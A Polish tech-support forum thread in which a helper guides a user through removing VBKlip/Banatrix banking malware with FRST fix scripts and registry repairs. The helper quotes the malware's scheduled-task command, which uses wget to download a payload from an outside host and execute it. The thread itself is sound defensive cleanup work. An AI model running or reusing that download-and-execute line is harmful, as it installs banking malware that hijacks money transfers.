Skocz do zawartości

Pomoc w usunięciu VBKlip / Banatrix


Rekomendowane odpowiedzi

Witam,

 

VBKlip 2.0 / Banatrix

Załapałem tego wirusa (złośliwe oprogramowanie?) najprawdopodobniej przy aktualizacji javy albo adobe playera, podszył się pod któryś z nich...

 

Efekt jest taki, że podmienia mi rachunek bankowy przy próbie przelewu. Na szczęście zauważyłem przed autoryzacją, tak więc pieniędzy nie straciłem.

Ale chcę się pozbyć drania :-)

 

Pozdrawiam

 

 

Addition.txt

FRST.txt

Shortcut.txt

Odnośnik do komentarza
Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.

Czy na pewno były czytane tutejsze zasady działu? Kiedy został pobrany FRST? Posługujesz się wersją z 1 grudnia, najnowszy FRST jest z wczoraj. Ponadto, brak całego zestawu logów i nie ma obowiązowego GMER.

 

Wspominana infekcja jest w systemie, ładuje się przez Harmonogram zadań:

 

Task: {A355DEFE-A9E5-4BE9-A7D9-887D010D5987} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://blockchainin.in/dat.bmp?data=NXCzqopbrzlpHNPSWurp;tc;1416071063 & start cmd /R dat.bmp

==================== One Month Modified Files and Folders =======

2014-12-04 10:58 - 2014-10-26 11:19 - 00000000 _____ () C:\ProgramData\dat.bmp
2014-11-15 18:03 - 2014-10-26 11:07 - 00332800 _____ () C:\ProgramData\wget.exe

 

 

Wdróż następujące działania:

 

1. Zaktualizuj FRST do najnowszej wersji: KLIK. Otwórz Notatnik i wklej w nim:

 

CloseProcesses:
Task: {A355DEFE-A9E5-4BE9-A7D9-887D010D5987} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://blockchainin.in/dat.bmp?data=NXCzqopbrzlpHNPSWurp;tc;1416071063 & start cmd /R dat.bmp
S4 nvvad_WaveExtensible; system32\drivers\nvvad32v.sys [X]
S3 TuneUpUtilitiesDrv; \??\C:\Program Files\TuneUp Utilities 2014\TuneUpUtilitiesDriver32.sys [X]
S2 TuneUp.UtilitiesSvc; "C:\Program Files\TuneUp Utilities 2014\TuneUpUtilitiesService32.exe" [X]
HKLM\...\Run: [] => [X]
HKU\S-1-5-21-3833150328-1824991979-3301933300-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.gazeta.pl/0,0.html?p=170
C:\ProgramData\dat.bmp
C:\ProgramData\wget.exe
C:\ProgramData\McAfee
C:\ProgramData\TuneUp Software
C:\Users\AiR\AppData\Roaming\TuneUp Software
C:\Windows\system32\authuitu.dll
C:\Windows\system32\TURegOpt.exe
C:\Windows\system32\uxtuneup.dll
CMD: dir /a C:\ProgramData
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

2. Oprogramowanie TuneUp nie zostało całkowicie odinstalowane. Uruchom narzędzie Microsoftu: KLIK. Zaakceptuj > Wykryj problemy i pozwól mi wybrać poprawki do zastosowania > Odinstalowywanie > zaznacz na liście po kolei dwa ukryte wpisy TuneUp Utilities 2014 > Dalej.

 

3. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa logi. Dołącz też plik fixlog.txt. Ponadto, w Firefox jest niejasny dodatek o nieznajdowanym na Google identyfikatorze, czy kojarzysz instalację (podaj link skąd):

 

FF Extension: Firefox Google Search - C:\Users\AiR\AppData\Roaming\Mozilla\Firefox\Profiles\jb286bnm.default\Extensions\jid1-ruV7VAC61k9bqA@jetpack.xpi [2014-11-12]

 

Odnośnik do komentarza

Coś poszło nie tak...

 

Ściągnąłem nowego FRST, skopiowałem i zapisałem fixlist w txt, uruchomiłem, poczekałem do końca i zresetowałem. No i system już nie wstał, niby się uruchamia i potem czarny ekran (w trybie awaryjnym też). Po włożeniu płytki instalacyjnej windowsa chce od razu instalować nowy system (nie pyta czy naprawić).

 

Załączam Fixlog, może coś z niego wyczytasz...

 

Na razie przygotowuję się do ponownej instalacji windowsa...

 

 

Fixlog.txt

Odnośnik do komentarza
Cytat

No i system już nie wstał, niby się uruchamia i potem czarny ekran (w trybie awaryjnym też). Po włożeniu płytki instalacyjnej windowsa chce od razu instalować nowy system (nie pyta czy naprawić).

 

Nie wiem o co chodzi, Fix nie przedstawia żadnych innych operacji niż zadane. Czy działa Ostatnia poprawna konfiguracja? Czy da się zrobić log FRST z poziomu środowiska zewnętrznego: KLIK?

Odnośnik do komentarza

Skan FRST nic nie widzi, ale wiem już gdzie jest usterka i jak to naprawić - naprawa jest wbrew pozorom prosta i nie rób przypadkiem reinstalacji. Plik authuitu.dll modyfikuje klasę Authentication UI Logon UI zamieniając odnośnik do systemowej biblioteki na własny. W związku z tym poproszę o dodatkowe skany przed próbą korekty wpisów rejestru. Otwórz Notatnik i wklej w nim:

 

Reg: reg query HKLM\SOFTWARE\Classes\CLSID\{00711705-12C5-420B-A4E5-6413F2AB3C7B} /s
Reg: reg query HKLM\SOFTWARE\Classes\CLSID\{7986d495-ce42-4926-8afc-26dfa299cadb} /s

 

Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Dostarcz wynikowy fixlog.txt.

Odnośnik do komentarza

Tak, dokładnie jest tu ta modyfikacja. Przechodzimy do korekty:

 

1. Otwórz Notatnik i wklej w nim:

 

S4 nvvad_WaveExtensible; system32\drivers\nvvad32v.sys [X]
S3 TuneUpUtilitiesDrv; \??\C:\Program Files\TuneUp Utilities 2014\TuneUpUtilitiesDriver32.sys [X]
S2 TuneUp.UtilitiesSvc; "C:\Program Files\TuneUp Utilities 2014\TuneUpUtilitiesService32.exe" [X]
S2 UxTuneUp; %SystemRoot%\System32\uxtuneup.dll [X]
Reg: reg delete HKLM\SOFTWARE\Classes\CLSID\{00711705-12C5-420B-A4E5-6413F2AB3C7B} /f
Reg: reg delete HKLM\SOFTWARE\Classes\CLSID\{7986d495-ce42-4926-8afc-26dfa299cadb}\InprocServer32 /v {00711705-12C5-420B-A4E5-6413F2AB3C7B} /f
Reg: reg add HKLM\SOFTWARE\Classes\CLSID\{7986d495-ce42-4926-8afc-26dfa299cadb}\InprocServer32 /ve /t REG_EXPAND_SZ /d ^%SystemRoot^%\system32\authui.dll /f
Reg: reg query HKLM\SOFTWARE\Classes\CLSID\{7986d495-ce42-4926-8afc-26dfa299cadb} /s

 

Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Powstanie kolejny fixlog.txt - przedstaw go.

 

2. Czarny ekran powinien zniknąć. Zaloguj się do Windows i wykonaj zaległe punkty:

 

picasso napisał:


2. Oprogramowanie TuneUp nie zostało całkowicie odinstalowane. Uruchom narzędzie Microsoftu: KLIK. Zaakceptuj > Wykryj problemy i pozwól mi wybrać poprawki do zastosowania > Odinstalowywanie > zaznacz na liście po kolei dwa ukryte wpisy TuneUp Utilities 2014 > Dalej.

 

3. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa logi. Dołącz też plik fixlog.txt. Ponadto, w Firefox jest niejasny dodatek o nieznajdowanym na Google identyfikatorze, czy kojarzysz instalację (podaj link skąd):

 


FF Extension: Firefox Google Search - C:\Users\AiR\AppData\Roaming\Mozilla\Firefox\Profiles\jb286bnm.default\Extensions\jid1-ruV7VAC61k9bqA@jetpack.xpi [2014-11-12]

 

Odnośnik do komentarza

OK. Wszystkie poprzednie operacje wykonane, infekcja pomyślnie usunięta. Skoro nie rozpoznajesz tego dodatku "Firefox Google Search", to musi być coś szkodliwego. Kolejna porcja czynności:

 

1. Wyczyść Firefox: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj program Firefox. Zakładki i hasła nie zostaną naruszone, ale używane dodatki Adblock Plus i Eliminator Slajdów trzeba będzie przeinstalować.

 

2. Otwórz Notatnik i wklej w nim:

 

RemoveDirectory: C:\MATS
DeleteQuarantine:

 

Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Powstanie kolejny fixlog.txt.

 

3. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt

Odnośnik do komentarza
Gość
Ten temat został zamknięty. Brak możliwości dodania odpowiedzi.
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...